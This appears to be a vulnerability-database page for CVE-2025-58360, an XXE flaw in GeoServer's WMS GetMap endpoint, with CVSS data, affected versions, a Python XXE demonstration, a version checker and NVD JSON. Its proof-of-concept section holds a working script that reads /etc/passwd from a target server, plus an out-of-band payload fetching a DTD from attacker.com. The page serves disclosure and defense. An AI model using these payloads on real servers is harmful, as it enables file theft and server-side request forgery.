Security Vulnerability Report
CVE-2025-58360 CVSS 8.2 HIGH

Published: 2025-11-25 21:15:56
Last Modified: 2025-12-12 13:54:01

Description

GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0.

Two points a practitioner should take from the data on this page. First, the page's own numbers disagree on the upper bound of the 2.26 branch: the description and the NVD configuration say "before 2.26.2", but the fix list names 2.26.3. Treat 2.26.2 as unverified and upgrade to 2.26.3 or later on that branch (the vendor advisory, GHSA-fjf5-xgmq-5525, is the authoritative source). Second, the weakness is CWE-611 (Improper Restriction of XML External Entity Reference) and CISA added the CVE to its Known Exploited Vulnerabilities catalog on 2025-12-11 with a required action due 2026-01-01, so an Internet-exposed GeoServer in the affected range should be assumed to be under active attack and patched or taken offline, not just scheduled.
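GeoServer's GetMap handler is Java, and the advisory does not publish the vulnerable parser code, so the mechanism is easiest to see with a parser that can be run offline. The example below is ours, not GeoServer's and not part of the advisory: Python's xml.sax exposes the same switch (external general entities resolved or not), so the same XXE document reads a secret file under the CWE-611 configuration and yields nothing under the hardened one. The secret file, the XML body (element names borrowed from the shape of the PoC on this page, not from the WMS schema) and the reject_doctype front-door check are constructed for the demonstration.

```python
"""XXE mechanics behind CVE-2025-58360, reproduced with Python's xml.sax.

Added example, not GeoServer code. The parser feature toggled here
(external general entities) is the CWE-611 switch; everything else
(secret file, document, element names) is constructed for the demo.
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import feature_external_ges


class _TextCollector(xml.sax.ContentHandler):
    """Collects the character data of every element, keyed by tag name."""

    def __init__(self):
        super().__init__()
        self.text = {}
        self._stack = []

    def startElement(self, name, attrs):
        self._stack.append(name)
        self.text.setdefault(name, "")

    def characters(self, content):
        if self._stack:
            self.text[self._stack[-1]] += content

    def endElement(self, name):
        self._stack.pop()


def build_getmap_xxe(file_uri: str) -> bytes:
    """GetMap-shaped body (the PoC's layout, not the WMS schema) whose <sld>
    element carries a reference to an external entity pointing at file_uri."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE wms [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>
<wms><GetMap><layers>topp:states</layers><sld>&xxe;</sld></GetMap></wms>""".encode()


def parse_sld_text(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse with xml.sax and return the text content of <sld>.

    resolve_external_entities=True is the vulnerable configuration: the
    parser fetches whatever SYSTEM identifier the DOCTYPE names and splices
    the result into the document. False (Python's default since 3.7.1)
    leaves the entity reference unexpanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text.get("sld", "")


def reject_doctype(xml_bytes: bytes) -> bool:
    """Front-door check for a request filter: a WMS request body never needs
    a DTD, so refuse any document that declares one. Covers SYSTEM/PUBLIC
    general entities and parameter entities alike. Assumes an ASCII-compatible
    encoding; normalise UTF-16 bodies before applying it."""
    return b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes


def demo() -> dict:
    """Write a constructed secret file, then parse the same XXE body with the
    vulnerable and the hardened parser configuration."""
    secret = "db_password=constructed-secret-42"  # constructed, not real
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(secret)
    try:
        body = build_getmap_xxe(Path(path).as_uri())
        return {
            "secret": secret,
            "vulnerable": parse_sld_text(body, resolve_external_entities=True),
            "hardened": parse_sld_text(body, resolve_external_entities=False),
            "rejected_at_front_door": reject_doctype(body),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable parse returns the file's contents inside <sld>; the hardened parse returns an empty string because the reference is simply not followed. reject_doctype is the mitigation to put in front of an instance that cannot be patched immediately: rejecting any DOCTYPE also blocks parameter-entity and entity-expansion variants that an allow-list of entity names would miss.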

CVSS Details

Two CVSS 3.1 assessments are recorded for this CVE, one from the CNA and one from NVD's own analysis. They agree on exploitability (network-reachable, low complexity, no privileges, no user interaction; exploitability sub-score 3.9) and differ on impact.

CVSS Score (CNA)
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

CVSS Score (NVD)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The CNA vector (C:H/I:N/A:L) describes what an XXE demonstrably gives an attacker: file read and server-side requests, with some denial-of-service potential. NVD's vector rates the outcome as full compromise. Prioritise on the higher score; the KEV listing makes the distinction moot for exposed instances.

Configurations (Affected Products)

cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:* versionEndExcluding 2.25.6 - VULNERABLE
cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:* versionStartIncluding 2.26.0, versionEndExcluding 2.26.2 - VULNERABLE
GeoServer < 2.25.6
GeoServer >= 2.26.0 and < 2.26.2
Fixed releases named in the description: 2.25.6, 2.26.3, 2.27.0
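To decide which builds in an inventory fall inside these ranges, the two cpeMatch entries from this page's configuration data can be evaluated directly. The evaluator below is an added example, not NVD or GeoServer tooling: it implements NVD's versionStartIncluding/Excluding and versionEndIncluding/Excluding bounds in general, plus a small parser for GeoServer-style version strings (assumed format: dotted numbers with an optional -RC or -SNAPSHOT qualifier, which is treated as sorting below the release of the same number). It reports 2.26.2 as not affected because that is what the NVD data says; the description's fix list names 2.26.3, so confirm that edge against the vendor advisory before relying on it.

```python
"""Evaluate NVD cpeMatch version ranges against a GeoServer version string.

Added example. The two match entries are copied from this page's
configuration data (matchCriteriaId omitted); the evaluator, the version
parser and the sample versions are ours.
"""
from __future__ import annotations

import re

# cpeMatch nodes as published on this page for CVE-2025-58360.
CVE_2025_58360_MATCHES = [
    {"vulnerable": True, "versionEndExcluding": "2.25.6"},
    {"vulnerable": True, "versionStartIncluding": "2.26.0",
     "versionEndExcluding": "2.26.2"},
]

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:[-.]?([A-Za-z].*))?$")


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '2.26.1', '2.26' or '2.26.1-RC' into a comparable tuple.

    Numeric components are padded to three places so 2.26 == 2.26.0, and a
    trailing qualifier (-RC, -SNAPSHOT, ...) is mapped to -1 so that it sorts
    below the released build of the same number. This is an assumption about
    GeoServer's scheme, not something the advisory states."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(part) for part in m.group(1).split("."))
    nums = nums + (0,) * (3 - len(nums))
    qualifier = 0 if m.group(2) is None else -1
    return nums + (qualifier,)


def in_range(version: str, match: dict) -> bool:
    """Apply the four optional NVD bounds of one cpeMatch entry.
    A bound that is absent from the entry is unbounded on that side."""
    v = parse_version(version)
    bounds = (
        ("versionStartIncluding", lambda b: v >= parse_version(b)),
        ("versionStartExcluding", lambda b: v > parse_version(b)),
        ("versionEndIncluding", lambda b: v <= parse_version(b)),
        ("versionEndExcluding", lambda b: v < parse_version(b)),
    )
    return all(check(match[key]) for key, check in bounds if key in match)


def is_affected(version: str, matches=CVE_2025_58360_MATCHES) -> bool:
    """True if any entry flagged vulnerable contains the version."""
    return any(m.get("vulnerable", False) and in_range(version, m)
               for m in matches)


if __name__ == "__main__":
    # Sample versions are ours; 2.26.2 shows the NVD-vs-fix-list discrepancy.
    for sample in ("2.24.3", "2.25.5", "2.25.6", "2.26.0", "2.26.1",
                   "2.26.2", "2.26.3", "2.27.0"):
        print(f"{sample:>8}: {'AFFECTED' if is_affected(sample) else 'ok'}")
```

Feed it the version string GeoServer reports (the welcome page or the REST about/version resource, depending on what you have access to) rather than a package version, since distribution packages sometimes carry a different number from the upstream release.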

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# XXE PoC for CVE-2025-58360 - GeoServer GetMap XXE Injection
# Target: vulnerable GeoServer /geoserver/wms endpoint
import requests

target = "http://target-server:8080/geoserver/wms"

# XXE payload to read a local file. The <wms>/<GetMap> body layout is the
# PoC's own; the entity reference is placed in the <sld> element.
xxe_payload = '''<?xml version="1.0"?>
<!DOCTYPE wms [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<wms>
  <GetMap>
    <layers>topp:states</layers>
    <sld>&xxe;</sld>
    <format>image/png</format>
  </GetMap>
</wms>'''

# Alternative: XXE for SSRF / out-of-band confirmation. attacker.com is a
# placeholder for a host you control; a DTD fetch in its access log confirms
# the parser resolved the external entity even if nothing is reflected.
xxe_ssrf_payload = '''<?xml version="1.0"?>
<!DOCTYPE wms [
  <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<wms>
  <GetMap>
    <layers>topp:states</layers>
    <sld>&xxe;</sld>
  </GetMap>
</wms>'''

# Send malicious request (swap in xxe_ssrf_payload for the out-of-band test)
headers = {
    'Content-Type': 'application/xml',
    'User-Agent': 'Mozilla/5.0'
}
response = requests.post(target, data=xxe_payload, headers=headers, timeout=10)
print(f"Status: {response.status_code}")
print(f"Response: {response.text[:500]}")

The script only prints the response. Whether file contents are reflected depends on how the GetMap handler reports the resulting error, so a 200 or an XML error body on its own proves nothing; the out-of-band payload (a DTD fetch arriving at a host you control) is the reliable confirmation, and any test must stay within the authorised scope.

References

https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525 (Vendor Advisory)
https://osgeo-org.atlassian.net/browse/GEOS-11682 (Issue Tracking)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58360 (US Government Resource)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58360", "sourceIdentifier": "[email protected]", "published": "2025-11-25T21:15:56.363", "lastModified": "2025-12-12T13:54:01.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-12-11", "cisaActionDue": "2026-01-01", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", 
"cisaVulnerabilityName": "OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.25.6", "matchCriteriaId": "929A415A-3926-49DE-855E-9363B5E495D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.26.0", "versionEndExcluding": "2.26.2", "matchCriteriaId": "58DCFD5D-914E-442F-AD07-C019C3BDDB2A"}]}]}], "references": [{"url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://osgeo-org.atlassian.net/browse/GEOS-11682", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58360", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}